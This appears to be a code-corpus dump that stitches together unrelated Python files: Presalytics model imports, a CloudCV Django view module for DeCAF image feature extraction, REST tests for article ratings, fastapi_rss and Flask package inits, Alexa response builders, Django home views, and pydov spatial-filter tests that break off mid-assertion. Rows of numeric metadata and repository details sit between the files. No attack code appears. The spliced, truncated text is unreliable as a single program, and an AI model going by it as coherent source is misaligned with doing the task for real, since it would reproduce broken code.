from presalytics_story.models.ooxml_document_all_of import OoxmlDocumentAllOf
from presalytics_story.models.outline import Outline
from presalytics_story.models.permission_type import PermissionType
from presalytics_story.models.permission_type_all_of import PermissionTypeAllOf
from presalytics_story.models.problem_detail import ProblemDetail
from presalytics_story.models.story import Story
from presalytics_story.models.story_all_of import StoryAllOf
from presalytics_story.models.story_collaborator import StoryCollaborator
from presalytics_story.models.story_collaborator_all_of import StoryCollaboratorAllOf
from presalytics_story.models.story_outline_history import StoryOutlineHistory
from presalytics_story.models.story_outline_history_all_of import StoryOutlineHistoryAllOf
| 42.166667 | 124 | 0.864032 | 158 | 1,265 | 6.664557 | 0.35443 | 0.185185 | 0.246914 | 0.320988 | 0.376068 | 0.317189 | 0.08547 | 0 | 0 | 0 | 0 | 0.006087 | 0.090909 | 1,265 | 29 | 125 | 43.62069 | 0.909565 | 0.223715 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1597772c6e83854d8ef1f4215a80a3bead638cb2 | 14,489 | py | Python | app/decaf_views.py | aroranipun04/CloudCV-Old | c17f5be8a221532c77d413b6afc6bd0be5e4f788 | [
"MIT"
] | 11 | 2016-02-29T21:12:58.000Z | 2016-07-06T22:29:22.000Z | app/decaf_views.py | aroranipun04/CloudCV-Old | c17f5be8a221532c77d413b6afc6bd0be5e4f788 | [
"MIT"
] | 9 | 2016-03-04T15:51:34.000Z | 2016-05-29T10:28:02.000Z | app/decaf_views.py | aroranipun04/CloudCV-Old | c17f5be8a221532c77d413b6afc6bd0be5e4f788 | [
"MIT"
] | 16 | 2016-02-23T03:22:02.000Z | 2016-07-09T18:46:34.000Z | __author__ = 'dexter'
from os.path import splitext, basename
from urlparse import urlparse
from querystring_parser import parser
from PIL import Image
from django.views.generic import CreateView
from django.views.decorators.csrf import csrf_exempt
from app.models import Picture, Decaf, Decafmodel
import app.conf as conf
from .response import JSONResponse, response_mimetype
from celeryTasks.webTasks.decafTask import decafImages
from cloudcv17 import config
import time
import os
import json
import traceback
import shortuuid
import requests
import redis
import re
redis_obj = redis.StrictRedis(host=config.REDIS_HOST, port=6379, db=0)
ps_obj = redis_obj.pubsub()
decaf_channel_name = 'decaf_server_queue'
IMAGEFOLDER = '/srv/share/cloudcv/jobs/'
DEMO_IMAGE_PATH = '/srv/share/cloudcv/jobs/demo'
def log_to_terminal(message, socketid):
redis_obj.publish('chat', json.dumps({'error': str(message), 'socketid': str(socketid)}))
def decaf_wrapper_local(src_path, output_path, socketid, result_path, single_file_name='', modelname=''):
try:
src_path = os.path.join(src_path, single_file_name)
if os.path.isdir(src_path):
result_url = urlparse(result_path).path
result_path = os.path.join(result_url, 'results')
else:
result_url = os.path.dirname(urlparse(result_path).path)
result_path = os.path.join(result_url, 'results')
decafImages.delay(src_path, socketid, output_path, result_path)
except:
log_to_terminal(str(traceback.format_exc()), socketid)
class DecafCreateView(CreateView):
model = Decaf
r = None
socketid = None
fields = "__all__"
def getThumbnail(self, image_url_prefix, name):
im = Image.open('/var/www/html/cloudcv/fileupload' + image_url_prefix + name)
size = 128, 128
im.thumbnail(size, Image.ANTIALIAS)
filename, fileext = splitext(basename(name))
file = image_url_prefix + 'thumbnails/' + filename + '.' + fileext
im.save('/var/www/html/cloudcv/fileupload' + file)
return file
count_hits = 0
def form_valid(self, form):
self.r = redis.StrictRedis(host='localhost', port=6379, db=0)
self.socketid = self.request.POST['socketid-hidden']
try:
self.object = form.save()
all_files = self.request.FILES.getlist('file')
data = {'files': []}
except:
log_to_terminal(str(traceback.format_exc()), self.socketid)
old_save_dir = os.path.dirname(conf.PIC_DIR)
folder_name = str(shortuuid.uuid())
save_dir = os.path.join(conf.PIC_DIR, folder_name)
output_path = os.path.join(save_dir, 'results')
# Make the new directory based on time
if not os.path.exists(save_dir):
os.makedirs(save_dir)
os.makedirs(os.path.join(save_dir, 'results'))
if len(all_files) == 1:
log_to_terminal(str('Downloading Image...'), self.socketid)
else:
log_to_terminal(str('Downloading Images...'), self.socketid)
for file in all_files:
try:
a = Picture()
tick = time.time()
strtick = str(tick).replace('.', '_')
fileName, fileExtension = os.path.splitext(file.name)
file.name = fileName + strtick + fileExtension
a.file.save(file.name, file)
file.name = a.file.name
imgfile = Image.open(os.path.join(old_save_dir, file.name))
size = (500, 500)
imgfile.thumbnail(size, Image.ANTIALIAS)
imgfile.save(os.path.join(save_dir, file.name))
thumbPath = os.path.join(folder_name, file.name)
data['files'].append({
'url': conf.PIC_URL + thumbPath,
'name': file.name,
'type': 'image/png',
'thumbnailUrl': conf.PIC_URL + thumbPath,
'size': 0,
})
except:
log_to_terminal(str(traceback.format_exc()), self.socketid)
if len(all_files) == 1:
log_to_terminal(str('Processing Image...'), self.socketid)
else:
log_to_terminal(str('Processing Images...'), self.socketid)
time.sleep(.5)
# This is for running it locally ie on Godel
decaf_wrapper_local(save_dir, output_path, self.socketid, os.path.join(conf.PIC_URL, folder_name))
# This is for posting it on Redis - ie to Rosenblatt
# classify_wrapper_redis(job_directory, socketid, result_folder)
response = JSONResponse(data, {}, response_mimetype(self.request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
def get_context_data(self, **kwargs):
context = super(DecafCreateView, self).get_context_data(**kwargs)
context['pictures'] = Decaf.objects.all()
return context
@csrf_exempt
def demoDecaf(request):
post_dict = parser.parse(request.POST.urlencode())
try:
if 'src' not in post_dict:
# Run on all images:
imgname = ''
img_url = os.path.join(os.path.dirname(urlparse(conf.PIC_URL.rstrip('/')).path), 'demo')
else:
data = {'info': 'Processing'}
img_url = post_dict['src']
imgname = basename(urlparse(img_url).path)
output_path = os.path.join(conf.LOCAL_DEMO_PIC_DIR, 'results')
if not os.path.exists(output_path):
os.makedirs(output_path)
log_to_terminal('Processing image...', post_dict['socketid'])
# This is for running it locally ie on Godel
decaf_wrapper_local(conf.LOCAL_DEMO_PIC_DIR, output_path, post_dict['socketid'], img_url, imgname)
# This is for posting it on Redis - ie to Rosenblatt
# classify_wrapper_redis(image_path, post_dict['socketid'], result_path)
data = {'info': 'Completed'}
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
except:
data = {'result': str(traceback.format_exc())}
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
def decafDemo(request):
post_dict = parser.parse(request.POST.urlencode())
log_to_terminal('Processing Demo Images Now', post_dict['socketid'])
if 'src' in post_dict and post_dict['src'] != '':
file_name = basename(urlparse(post_dict['src']).path)
redis_obj.publish(decaf_channel_name, json.dumps(
{'dir': DEMO_IMAGE_PATH, 'flag': '2', 'socketid': post_dict['socketid'], 'demo': 'True', 'filename': file_name}))
else:
redis_obj.publish(decaf_channel_name, json.dumps(
{'dir': DEMO_IMAGE_PATH, 'flag': '2', 'socketid': post_dict['socketid']}))
def downloadAndSaveImages(url_list, socketid):
try:
uuid = shortuuid.uuid()
directory = os.path.join(conf.PIC_DIR, str(uuid))
if not os.path.exists(directory):
os.mkdir(directory)
for url in url_list[""]:
try:
log_to_terminal(str(url), socketid)
file = requests.get(url)
file_full_name_raw = basename(urlparse(url).path)
file_name_raw, file_extension = os.path.splitext(file_full_name_raw)
                # re.sub(pattern, replacement, string): strip all non-alphanumeric characters from the stem
                file_name = re.sub('[^a-zA-Z0-9]+', '', file_name_raw)
                # Save the download inside the per-request directory
                local_path = os.path.join(directory, file_name + file_extension)
                with open(local_path, 'wb') as f:
                    f.write(file.content)
                imgFile = Image.open(local_path)
size = (500, 500)
imgFile.thumbnail(size, Image.ANTIALIAS)
imgFile.save(os.path.join(conf.PIC_DIR, str(uuid), file_name + file_extension))
log_to_terminal('Saved Image: ' + str(url), socketid)
except Exception as e:
                print(str(e))
return uuid, directory
    except Exception:
        print('Exception' + str(traceback.format_exc()))
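The filename sanitisation used above can be checked in isolation; a minimal standalone sketch of the same steps (Python 3 stdlib only, independent of Django and of this module, with `sanitized_filename` as a hypothetical helper name):

```python
import re
from os.path import basename, splitext
from urllib.parse import urlparse

def sanitized_filename(url):
    # Mirror the steps above: take the basename of the URL path, split off
    # the extension, and strip every non-alphanumeric character from the stem.
    raw = basename(urlparse(url).path)
    stem, ext = splitext(raw)
    return re.sub('[^a-zA-Z0-9]+', '', stem) + ext

print(sanitized_filename('http://example.org/pics/my photo (1).jpg'))  # myphoto1.jpg
```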
@csrf_exempt
def decafDropbox(request):
post_dict = parser.parse(request.POST.urlencode())
try:
if 'urls' not in post_dict:
data = {'error': 'NoFileSelected'}
else:
data = {'info': 'ProcessingImages'}
# Download these images. Run Feature Extraction. Post results.
uuid, image_path = downloadAndSaveImages(post_dict['urls'], post_dict['socketid'])
output_path = os.path.join(image_path, 'results')
if not os.path.exists(output_path):
os.makedirs(output_path)
decaf_wrapper_local(image_path, output_path, post_dict['socketid'], os.path.join(conf.PIC_URL, uuid))
log_to_terminal('Processing Images Now', post_dict['socketid'])
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
    except Exception:
data = {'result': str(traceback.format_exc())}
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
class DecafModelCreateView(CreateView):
model = Decafmodel
r = None
socketid = None
def getThumbnail(self, image_url_prefix, name):
im = Image.open('/var/www/html/cloudcv/fileupload' + image_url_prefix + name)
size = 128, 128
im.thumbnail(size, Image.ANTIALIAS)
filename, fileext = splitext(basename(name))
file = image_url_prefix + 'thumbnails/' + filename + '.' + fileext
im.save('/var/www/html/cloudcv/fileupload' + file)
return file
count_hits = 0
def form_valid(self, form):
self.r = redis.StrictRedis(host='localhost', port=6379, db=0)
        socketid = self.request.POST['socketid-hidden']
modelname = ''
if 'model-name' in self.request.POST:
modelname = self.request.POST['model-name']
            print(modelname)
self.socketid = socketid
try:
self.object = form.save()
all_files = self.request.FILES.getlist('file')
data = {'files': []}
        except Exception:
log_to_terminal(str(traceback.format_exc()), self.socketid)
old_save_dir = os.path.dirname(conf.PIC_DIR)
folder_name = str(shortuuid.uuid())
save_dir = os.path.join(conf.PIC_DIR, folder_name)
output_path = os.path.join(save_dir, 'results')
# Make the new directory based on time
if not os.path.exists(save_dir):
os.makedirs(save_dir)
os.makedirs(os.path.join(save_dir, 'results'))
log_to_terminal(str('SocketID: ' + str(self.socketid)), self.socketid)
if len(all_files) == 1:
log_to_terminal(str('Downloading Image...'), self.socketid)
else:
log_to_terminal(str('Downloading Images...'), self.socketid)
for file in all_files:
try:
a = Picture()
tick = time.time()
strtick = str(tick).replace('.', '_')
fileName, fileExtension = os.path.splitext(file.name)
file.name = fileName + strtick + fileExtension
a.file.save(file.name, file)
file.name = a.file.name
imgfile = Image.open(os.path.join(old_save_dir, file.name))
size = (500, 500)
imgfile.thumbnail(size, Image.ANTIALIAS)
imgfile.save(os.path.join(save_dir, file.name))
thumbPath = os.path.join(folder_name, file.name)
data['files'].append({
'url': conf.PIC_URL + thumbPath,
'name': file.name,
'type': 'image/png',
'thumbnailUrl': conf.PIC_URL + thumbPath,
'size': 0,
})
            except Exception:
log_to_terminal(str(traceback.format_exc()), self.socketid)
if len(all_files) == 1:
log_to_terminal(str('Processing Image...'), self.socketid)
else:
log_to_terminal(str('Processing Images...'), self.socketid)
time.sleep(.5)
        # This is for running it locally, i.e. on Godel
        decaf_wrapper_local(save_dir, output_path, socketid, os.path.join(
            conf.PIC_URL, folder_name), modelname=modelname)
        # This is for posting it on Redis, i.e. to Rosenblatt
        # classify_wrapper_redis(job_directory, socketid, result_folder)
response = JSONResponse(data, {}, response_mimetype(self.request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
def get_context_data(self, **kwargs):
context = super(DecafModelCreateView, self).get_context_data(**kwargs)
context['pictures'] = Decaf.objects.all()
return context
@csrf_exempt
def decaf_train(request):
post_dict = parser.parse(request.POST.urlencode())
try:
if 'urls' not in post_dict:
data = {'error': 'NoFileSelected'}
else:
data = {'info': 'ProcessingImages'}
# Download these images. Run Feature Extraction. Post results.
uuid, image_path = downloadAndSaveImages(post_dict['urls'], post_dict['socketid'])
output_path = os.path.join(image_path, 'results')
if not os.path.exists(output_path):
os.makedirs(output_path)
decaf_wrapper_local(image_path, output_path, post_dict['socketid'], os.path.join(conf.PIC_URL, uuid))
log_to_terminal('Processing Images Now', post_dict['socketid'])
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
    except Exception:
data = {'result': str(traceback.format_exc())}
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
# authors/apps/ratings/tests/test_ratings.py (andela/ah-jumanji-, BSD-3-Clause)
from rest_framework.reverse import reverse
from rest_framework import status
import logging
import json
# local imports
from .test_base import TestBase
logger = logging.getLogger(__file__)
class TestRatings(TestBase):
''' Ratings test cases '''
def test_post_rating(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.post(
reverse(
'ratings',
kwargs={
"slug": self.slug}),
data=self.rating,
format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['message'],
"Rating added successfully")
def test_post_bad_rating(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.post(
reverse(
'ratings',
kwargs={
"slug": self.slug}),
data=self.bad_rating,
format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['errors']['rating'],
['"10" is not a valid choice.'])
def test_article_author_cannot_rate(self):
self.client.credentials(
HTTP_AUTHORIZATION='Token ' +
self.author_token)
response = self.client.post(
reverse(
'ratings',
kwargs={
"slug": self.slug}),
data=self.rating,
format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['message'],
"You cannot rate your own article")
def test_get_average_rating(self):
self.client.credentials(
HTTP_AUTHORIZATION='Token ' +
self.author_token)
response = self.client.get(
reverse(
'ratings',
kwargs={
"slug": self.slug
}),
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['rating'],
5.0)
def test_delete_rating(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.delete(
reverse(
'delete_rating',
kwargs={
"slug": self.slug,
"id": self.id
}),
format='json')
logger.error(response.content)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['message'],
"Rating removed successfully")
def test_article_not_found_rate(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.post(
reverse(
'ratings',
kwargs={
"slug": "not-found"}),
data=self.rating,
format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['detail'],
"Article Not found")
def test_delete_rating_not_found(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.delete(
reverse(
'delete_rating',
kwargs={
"slug": self.slug,
"id": 12
}),
format='json')
logger.error(response.content)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['detail'],
"Rating Not found")
# fastapi_rss/models/__init__.py (elreydetoda/fastapi_rss, MIT)
# flake8: noqa
from fastapi_rss.models.category import Category, CategoryAttrs
from fastapi_rss.models.image import Image
from fastapi_rss.models.cloud import Cloud, CloudAttrs
from fastapi_rss.models.item import Item
from fastapi_rss.models.textinput import TextInput
from fastapi_rss.models.enclosure import Enclosure, EnclosureAttrs
from fastapi_rss.models.guid import GUID, GUIDAttrs
from fastapi_rss.models.source import Source, SourceAttrs
from fastapi_rss.models.feed import RSSFeed
# app/api/__init__.py (Andrewpqc/URL-shortener, MIT)
# coding: utf-8
from flask import Blueprint
api = Blueprint("api", __name__)
from . import statistics, urlmap, user, authentication
# platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/dumbo/calculators/calc_rail.py (SiliconLabs/gecko_sdk, Zlib)
from pyradioconfig.parts.common.calculators.calc_rail import CalcRail
class CalcRailDumbo(CalcRail):
pass
# Codewars/last_digit_of_a_large_number - (5 kyu).py (maxcohen31/A-bored-math-student, MIT)
def last_digit(a, b):
return pow(a, b, 10)
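For context, the three-argument form of the built-in `pow` performs modular exponentiation, so the last digit comes back quickly even when `a ** b` itself would be astronomically large; a quick standalone check:

```python
def last_digit(a, b):
    # pow(a, b, 10) computes (a ** b) % 10 without materialising a ** b
    return pow(a, b, 10)

print(last_digit(4, 1))         # 4
print(last_digit(4, 2))         # 6 (16 ends in 6)
print(last_digit(2, 10 ** 10))  # 6, still instant for a huge exponent
```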
# src/alexa_response_builder/__init__.py (parveenchahal/AlexaSkill_PCSongs, MIT)
def build_response(response: dict, session_attributes: dict = None, version: str = '1.0'):
    # Avoid a shared mutable default: fall back to a fresh dict per call.
    return {
        'version': version,
        'sessionAttributes': session_attributes if session_attributes is not None else {},
        'response': response
    }
def build_empty_response():
return {
'shouldEndSession': True
}
def build_pause_response(output: str = ""):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'directives': [{
'type': 'AudioPlayer.Stop'
}],
'shouldEndSession': True
}
def build_stop_response(output: str = ""):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'directives': [{
'type': 'AudioPlayer.Stop'
}],
'shouldEndSession': True
}
def build_speechlet_response(output: str, should_end_session: bool = True):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'shouldEndSession': should_end_session
}
def build_audio_response(url: str, token: str, should_end_session: bool = True, offsetInMilliseconds: int = 0, play_behaviour = 'REPLACE_ALL'):
return {
'directives': [{
'type': 'AudioPlayer.Play',
'playBehavior': play_behaviour,
'audioItem': {
'stream': {
'token': str(token),
'url': url,
'offsetInMilliseconds': offsetInMilliseconds
}
}
}],
'shouldEndSession': should_end_session
}
def build_audio_speechlet_response(output: str, url: str, token: str, should_end_session: bool = True, offsetInMilliseconds: int = 0, play_behaviour = 'REPLACE_ALL'):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'directives': [{
'type': 'AudioPlayer.Play',
'playBehavior': play_behaviour,
'audioItem': {
'stream': {
'token': str(token),
'url': url,
'offsetInMilliseconds': offsetInMilliseconds
}
}
}],
'shouldEndSession': should_end_session
}
def build_enqueue_audio_response(url: str, token: str, should_end_session: bool = True, offsetInMilliseconds: int = 0, play_behaviour = 'REPLACE_ALL'):
return {
'directives': [{
'type': 'AudioPlayer.Play',
'playBehavior': play_behaviour,
'audioItem': {
'stream': {
'token': str(token),
'url': url,
'offsetInMilliseconds': offsetInMilliseconds
}
}
}],
'shouldEndSession': should_end_session
    }
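As a usage sketch (the builder names mirror the module above, re-declared here in simplified form so the snippet runs standalone), an Alexa skill handler typically wraps a speechlet in the versioned envelope:

```python
def build_response(response, session_attributes=None, version='1.0'):
    # Versioned envelope expected by the Alexa Skills Kit.
    return {
        'version': version,
        'sessionAttributes': session_attributes or {},
        'response': response,
    }

def build_speechlet_response(output, should_end_session=True):
    # Plain-text speech output plus the session flag.
    return {
        'outputSpeech': {'type': 'PlainText', 'text': output},
        'shouldEndSession': should_end_session,
    }

envelope = build_response(build_speechlet_response('Playing your song'))
print(envelope['response']['outputSpeech']['text'])  # Playing your song
```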
# plugins/quetz_repodata_patching/setup.py (davidbrochart/quetz, BSD-3-Clause)
from setuptools import setup
setup(
name="quetz-repodata_patching",
install_requires="quetz",
entry_points={"quetz": ["quetz-repodata_patching = quetz_repodata_patching.main"]},
packages=["quetz_repodata_patching"],
)
# Home/views.py (NAL0/nalbt, MIT)
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
# Create your views here.
def index(request):
return render(request, 'Home/home.html')
def index2(request):
return render(request, "Home/SDG's.html")
@login_required
def index3(request):
return render(request, 'Home/constitutive_act.html')
def index4(request):
return render(request, 'Home/2.html')
def index5(request):
return render(request, 'Home/SADC_national_anthem.html')
def index6(request):
return render(request, 'Home/plan.html')
def index7(request):
return render(request, 'Home/g1.html')
def index8(request):
return render(request, 'Home/g2.html')
def index9(request):
return render(request, 'Home/g3.html')
def index10(request):
return render(request, 'Home/g4.html')
def index11(request):
return render(request, 'Home/g5.html')
def index12(request):
return render(request, 'Home/g6.html')
def index13(request):
return render(request, 'Home/g7.html')
def index14(request):
return render(request, 'Home/g8.html')
def index15(request):
return render(request, 'Home/g9.html')
def index16(request):
return render(request, 'Home/g10.html')
def index17(request):
return render(request, 'Home/g11.html')
def index18(request):
return render(request, 'Home/g12.html')
def index19(request):
return render(request, 'Home/g13.html')
def index20(request):
return render(request, 'Home/g14.html')
def index21(request):
return render(request, 'Home/g15.html')
def index22(request):
return render(request, 'Home/g16.html')
def index23(request):
return render(request, 'Home/g17.html')
def index24(request):
return render(request, 'Home/g18.html')
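The eighteen near-identical goal views (`index7` through `index24`) differ only in the template number, so they could be collapsed into one parametrized view such as `def goal(request, n): return render(request, goal_template(n))` wired to a URL pattern capturing the number (hypothetical, not part of this file). The template-name mapping can be sketched and checked in plain Python:

```python
def goal_template(n):
    # index7 renders Home/g1.html, index8 renders Home/g2.html, ...,
    # index24 renders Home/g18.html; n here is the goal number itself.
    return 'Home/g{}.html'.format(n)

print(goal_template(18))  # Home/g18.html
```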
# tests/test_util_location.py (GuillaumeVandekerckhove/pydov, MIT)
"""Module grouping tests for the pydov.util.location module."""
import pytest
from owslib.fes import (
And,
Or,
Not,
)
from pydov.util.location import (
Box,
Point,
Equals,
Disjoint,
Touches,
Within,
Intersects,
WithinDistance,
GmlObject
)
from owslib.etree import etree
from pydov.util.owsutil import set_geometry_column
from tests.abstract import clean_xml
class TestLocation(object):
"""Class grouping tests for the AbstractLocation subtypes."""
def test_box(self):
"""Test the default Box type.
Test whether the generated XML is correct.
"""
box = Box(94720, 186910, 112220, 202870)
xml = box.get_element()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
'<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
'</gml:Envelope>')
def test_box_wgs84(self):
"""Test the Box type with WGS84 coordinates.
Test whether the generated XML is correct.
"""
box = Box(3.6214, 50.9850, 3.8071, 51.1270, epsg=4326)
xml = box.get_element()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#4326">'
'<gml:lowerCorner>3.621400 50.985000</gml:lowerCorner>'
'<gml:upperCorner>3.807100 51.127000</gml:upperCorner>'
'</gml:Envelope>')
def test_box_invalid(self):
"""Test the Box type with the wrong ordering of coordinates.
Test whether a ValueError is raised.
"""
with pytest.raises(ValueError):
Box(94720, 202870, 186910, 112220)
def test_box_invalid_wgs84(self):
"""Test the Box type with the wrong ordering of WGS84 coordinates.
Test whether a ValueError is raised.
"""
with pytest.raises(ValueError):
Box(50.9850, 3.6214, 3.8071, 51.1270, epsg=4326)
def test_point(self):
"""Test the default Point type.
Test whether the generated XML is correct.
"""
point = Point(110680, 202030)
xml = point.get_element()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:pos>110680.000000 202030.000000</gml:pos></gml:Point>')
def test_point_wgs84(self):
"""Test the Point type with WGS84 coordinates.
Test whether the generated XML is correct.
"""
point = Point(3.8071, 51.1270, epsg=4326)
xml = point.get_element()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#4326">'
'<gml:pos>3.807100 51.127000</gml:pos></gml:Point>')
def test_gmlobject_element(self):
"""Test the GmlObject type with an etree.Element.
Test whether the returned XML is correct.
"""
with open('tests/data/util/location/polygon_single_31370.gml',
'r') as gmlfile:
gml = gmlfile.read()
gml_element = etree.fromstring(gml.encode('utf8'))
gml_element = gml_element.find(
'.//{http://www.opengis.net/gml}Polygon')
gml_object = GmlObject(gml_element)
assert clean_xml(etree.tostring(
gml_object.get_element()).decode('utf8')) == clean_xml(
'<gml:Polygon '
'srsName="urn:ogc:def:crs:EPSG::31370"><gml:exterior><gml'
':LinearRing><gml:posList>108636.150020818 194960.844295764 '
'108911.922161617 194291.111953824 109195.573506438 '
'195118.42837622 108636.150020818 '
'194960.844295764</gml:posList></gml:LinearRing></gml'
':exterior></gml:Polygon>')
def test_gmlobject_bytes(self):
"""Test the GmlObject type with a GML string.
Test whether the returned XML is correct.
"""
with open('tests/data/util/location/polygon_single_31370.gml',
'r') as gmlfile:
gml = gmlfile.read()
gml_element = etree.fromstring(gml.encode('utf8'))
gml_element = gml_element.find(
'.//{http://www.opengis.net/gml}Polygon')
gml_object = GmlObject(etree.tostring(gml_element))
assert clean_xml(etree.tostring(
gml_object.get_element()).decode('utf8')) == clean_xml(
'<gml:Polygon '
'srsName="urn:ogc:def:crs:EPSG::31370"><gml:exterior><gml'
':LinearRing><gml:posList>108636.150020818 194960.844295764 '
'108911.922161617 194291.111953824 109195.573506438 '
'195118.42837622 108636.150020818 '
'194960.844295764</gml:posList></gml:LinearRing></gml'
':exterior></gml:Polygon>')
def test_gmlobject_string(self):
"""Test the GmlObject type with a GML string.
Test whether the returned XML is correct.
"""
with open('tests/data/util/location/polygon_single_31370.gml',
'r') as gmlfile:
gml = gmlfile.read()
gml_element = etree.fromstring(gml.encode('utf8'))
gml_element = gml_element.find(
'.//{http://www.opengis.net/gml}Polygon')
gml_object = GmlObject(etree.tostring(gml_element).decode('utf8'))
assert clean_xml(etree.tostring(
gml_object.get_element()).decode('utf8')) == clean_xml(
'<gml:Polygon '
'srsName="urn:ogc:def:crs:EPSG::31370"><gml:exterior><gml'
':LinearRing><gml:posList>108636.150020818 194960.844295764 '
'108911.922161617 194291.111953824 109195.573506438 '
'195118.42837622 108636.150020818 '
'194960.844295764</gml:posList></gml:LinearRing></gml'
':exterior></gml:Polygon>')
class TestBinarySpatialFilters(object):
"""Class grouping tests for the AbstractBinarySpatialFilter subtypes."""
def test_equals_point(self):
"""Test the Equals spatial filter with a Point location.
Test whether the generated XML is correct.
"""
equals = Equals(Point(150000, 150000))
equals.set_geometry_column('geom')
xml = equals.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Equals><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Point srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:pos>150000.000000 150000.000000</gml:pos></gml:Point>'
'</ogc:Equals>')
def test_equals_nogeom(self):
"""Test the Equals spatial filter without setting a geometry column.
Test whether a RuntimeError is raised.
"""
equals = Equals(Point(150000, 150000))
with pytest.raises(RuntimeError):
equals.toXML()
def test_disjoint_box(self):
"""Test the Disjoint spatial filter with a Box location.
Test whether the generated XML is correct.
"""
disjoint = Disjoint(Box(94720, 186910, 112220, 202870))
disjoint.set_geometry_column('geom')
xml = disjoint.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Disjoint><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Envelope srsDimension="2" '
'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
'<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
'<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
'</gml:Envelope></ogc:Disjoint>')
def test_disjoint_nogeom(self):
"""Test the Disjoint spatial filter without setting a geometry column.
Test whether a RuntimeError is raised.
"""
disjoint = Disjoint(Point(150000, 150000))
with pytest.raises(RuntimeError):
disjoint.toXML()
def test_touches_box(self):
"""Test the Touches spatial filter with a Box location.
Test whether the generated XML is correct.
"""
touches = Touches(Box(94720, 186910, 112220, 202870))
touches.set_geometry_column('geom')
xml = touches.toXML()
assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
'<ogc:Touches><ogc:PropertyName>geom</ogc:PropertyName>'
'<gml:Envelope srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
            '<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
            '<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
            '</gml:Envelope></ogc:Touches>')

    def test_touches_nogeom(self):
        """Test the Touches spatial filter without setting a geometry column.

        Test whether a RuntimeError is raised.
        """
        touches = Touches(Point(150000, 150000))

        with pytest.raises(RuntimeError):
            touches.toXML()

    def test_within_box(self):
        """Test the Within spatial filter with a Box location.

        Test whether the generated XML is correct.
        """
        within = Within(Box(94720, 186910, 112220, 202870))
        within.set_geometry_column('geom')
        xml = within.toXML()

        assert clean_xml(etree.tostring(xml).decode('utf8')) == clean_xml(
            '<ogc:Within><ogc:PropertyName>geom</ogc:PropertyName>'
            '<gml:Envelope srsDimension="2" '
            'srsName="http://www.opengis.net/gml/srs/epsg.xml#31370">'
            '<gml:lowerCorner>94720.000000 186910.000000</gml:lowerCorner>'
            '<gml:upperCorner>112220.000000 202870.000000</gml:upperCorner>'
